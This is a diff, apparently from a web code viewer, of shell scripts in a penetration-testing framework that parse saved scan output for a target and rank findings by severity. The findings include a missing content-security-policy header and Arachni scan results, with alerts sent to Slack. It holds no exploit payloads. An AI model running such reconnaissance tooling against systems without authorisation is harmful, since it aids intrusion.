cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "$SEVERITY, $VULN_NAME, $TARGET, $(cat /tmp/match.out | tr '\n' ' ' | sed -r "s/</\&lh\;/g")" 2> /dev/null | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(cat /tmp/match.out | tr '\n' ' ') (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(cat /tmp/match.out | tr '\n' ' ' | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "$SEVERITY, $VULN_NAME, $TARGET, $(cat /tmp/match.out | tr '\n' ' ' | sed -r "s/</\&lh\;/g")" 2> /dev/null | tee -a "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(cat /tmp/match.out | tr '\n' ' ') (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(cat /tmp/match.out | tr '\n' ' ' | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
rm -f /tmp/match.out 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -1,21 +1,23 @@
|
|||
if [ "$SSL" = "true" ]; then
|
||||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CSP Not Enforced'
|
||||
FILENAME="$LOOT_DIR/web/headers-https-$TARGET.txt"
|
||||
MATCH="content-security-policy"
|
||||
SEVERITY='P5 - INFO'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='negative'
|
||||
SECONDARY_COMMANDS=''
|
||||
URI=""
|
||||
else
|
||||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CSP Not Enforced'
|
||||
FILENAME="$LOOT_DIR/web/headers-http-$TARGET.txt"
|
||||
MATCH="content-security-policy"
|
||||
SEVERITY='P5 - INFO'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='negative'
|
||||
SECONDARY_COMMANDS=''
|
||||
URI=""
|
||||
if [ -f $LOOT_DIR/web/headers-http-$TARGET.txt ]; then
|
||||
if [ "$SSL" = "true" ]; then
|
||||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CSP Not Enforced'
|
||||
FILENAME="$LOOT_DIR/web/headers-https-$TARGET.txt"
|
||||
MATCH="content-security-policy"
|
||||
SEVERITY='P5 - INFO'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='negative'
|
||||
SECONDARY_COMMANDS=''
|
||||
URI=""
|
||||
else
|
||||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CSP Not Enforced'
|
||||
FILENAME="$LOOT_DIR/web/headers-http-$TARGET.txt"
|
||||
MATCH="content-security-policy"
|
||||
SEVERITY='P5 - INFO'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='negative'
|
||||
SECONDARY_COMMANDS=''
|
||||
URI=""
|
||||
fi
|
||||
fi
|
||||
|
|
@ -0,0 +1,39 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Arachni Vulnerability Scan'
|
||||
FILENAME="${LOOT_DIR}/web/arachni_webscan_${TARGET}_*.txt"
|
||||
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
|
||||
|
||||
rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
rm -f /tmp/report.txt 2> /dev/null
|
||||
touch /tmp/report.txt 2> /dev/null
|
||||
x=0
|
||||
cat $FILENAME 2> /dev/null | egrep 'Proof\:|URL\:|Severity\:|\[\+\]\ \[' | sed 's/\n//g' | sed -r 's/</\&lh\;/g' | awk '{print $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15}' 2> /dev/null | tr -d '"' > /tmp/out 2> /dev/null
|
||||
|
||||
# DELETE FIRST LINE
|
||||
sed -i '1d' /tmp/out 2> /dev/null
|
||||
|
||||
cat /tmp/out 2> /dev/null | while read line; do
|
||||
x=$(( x+1 ))
|
||||
if [ $x -eq "1" ]; then
|
||||
echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [ $x -eq "2" ]; then
|
||||
if [[ $line =~ .*Critical.* ]]; then
|
||||
echo "P1 - CRITICAL," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [[ $line =~ .*High.* ]]; then
|
||||
echo "P2 - HIGH," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [[ $line =~ .*Medium.* ]]; then
|
||||
echo "P3 - MEDIUM," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [[ $line =~ .*Low.* ]]; then
|
||||
echo "P4 - LOW," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [[ $line =~ .*Informational.* ]]; then
|
||||
echo "P5 - INFO," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
fi
|
||||
elif [ $x -eq "3" ]; then
|
||||
echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [ $x -eq "4" ]; then
|
||||
echo "$line" >> /tmp/report.txt 2> /dev/null
|
||||
x=0
|
||||
fi
|
||||
done
|
||||
cat /tmp/report.txt 2> /dev/null | awk -F',' '{print $2 ", " $1 ", " $3 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt
|
||||
cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
|
@ -7,7 +7,7 @@ rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
|||
rm -f /tmp/report.txt 2> /dev/null
|
||||
touch /tmp/report.txt 2> /dev/null
|
||||
x=0
|
||||
cat $FILENAME 2> /dev/null | egrep 'Proof\:|URL\:|Severity\:|\[\+\]\ \[' | sed 's/\n//g' | awk '{print $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15}' 2> /dev/null | tr -d '"' > /tmp/out 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep 'Proof\:|URL\:|Severity\:|\[\+\]\ \[' | sed 's/\n//g' | sed -r 's/</\&lh\;/g' | awk '{print $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15}' 2> /dev/null | tr -d '"' > /tmp/out 2> /dev/null
|
||||
|
||||
# DELETE FIRST LINE
|
||||
sed -i '1d' /tmp/out 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -7,7 +7,7 @@ rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
|||
rm -f /tmp/report.txt 2> /dev/null
|
||||
touch /tmp/report.txt 2> /dev/null
|
||||
x=0
|
||||
cat $FILENAME 2> /dev/null | egrep 'Proof\:|URL\:|Severity\:|\[\+\]\ \[' | sed 's/\n//g' | awk '{print $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15}' 2> /dev/null | tr -d '"' > /tmp/out 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep 'Proof\:|URL\:|Severity\:|\[\+\]\ \[' | sed 's/\n//g' | sed -r 's/</\&lh\;/g' | awk '{print $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15}' 2> /dev/null | tr -d '"' > /tmp/out 2> /dev/null
|
||||
|
||||
# DELETE FIRST LINE
|
||||
sed -i '1d' /tmp/out 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -61,13 +61,13 @@ awk 'FNR==58' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -
|
|||
awk 'FNR==59' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==60' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
|
||||
egrep '^High' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P2 - HIGH, " $2 ", http://" $50 ", " $3}' > /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Medium' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P3 - MEDIUM, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Low' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P4 - LOW, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Informational' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P5 - INFO, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^High' /tmp/report.csv 2> /dev/null | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P2 - HIGH, " $2 ", http://" $50 ", " $3}' > /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Medium' /tmp/report.csv 2> /dev/null | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P3 - MEDIUM, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Low' /tmp/report.csv 2> /dev/null | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P4 - LOW, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Informational' /tmp/report.csv 2> /dev/null | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P5 - INFO, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
|
||||
mv -f /tmp/report_final.csv $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
||||
cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
||||
rm -f /tmp/report_final.csv /tmp/report.csv /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null 2> /dev/null
|
||||
rm -f /tmp/report_final.csv /tmp/report.csv /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null
|
||||
|
|
@ -61,13 +61,13 @@ awk 'FNR==58' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -
|
|||
awk 'FNR==59' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==60' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
|
||||
egrep '^High' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P2 - HIGH, " $2 ", http://" $50 ", " $3}' > /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Medium' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P3 - MEDIUM, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Low' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P4 - LOW, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Informational' /tmp/report.csv | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P5 - INFO, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^High' /tmp/report.csv 2> /dev/null | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P2 - HIGH, " $2 ", http://" $50 ", " $3}' > /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Medium' /tmp/report.csv 2> /dev/null | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P3 - MEDIUM, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Low' /tmp/report.csv 2> /dev/null | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P4 - LOW, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
egrep '^Informational' /tmp/report.csv 2> /dev/null | awk -v AWK_TARGET="$TARGET" -F',' '$50=AWK_TARGET{print "P5 - INFO, " $2 ", http://" $50 ", " $3}' >> /tmp/report_final.csv 2> /dev/null
|
||||
|
||||
mv -f /tmp/report_final.csv $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
||||
cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
||||
rm -f /tmp/report_final.csv /tmp/report.csv /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null 2> /dev/null
|
||||
rm -f /tmp/report_final.csv /tmp/report.csv /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null
|
||||
870425
wordlists/domains-all.txt
870425
wordlists/domains-all.txt
File diff suppressed because it is too large
Load Diff
Loading…
Reference in New Issue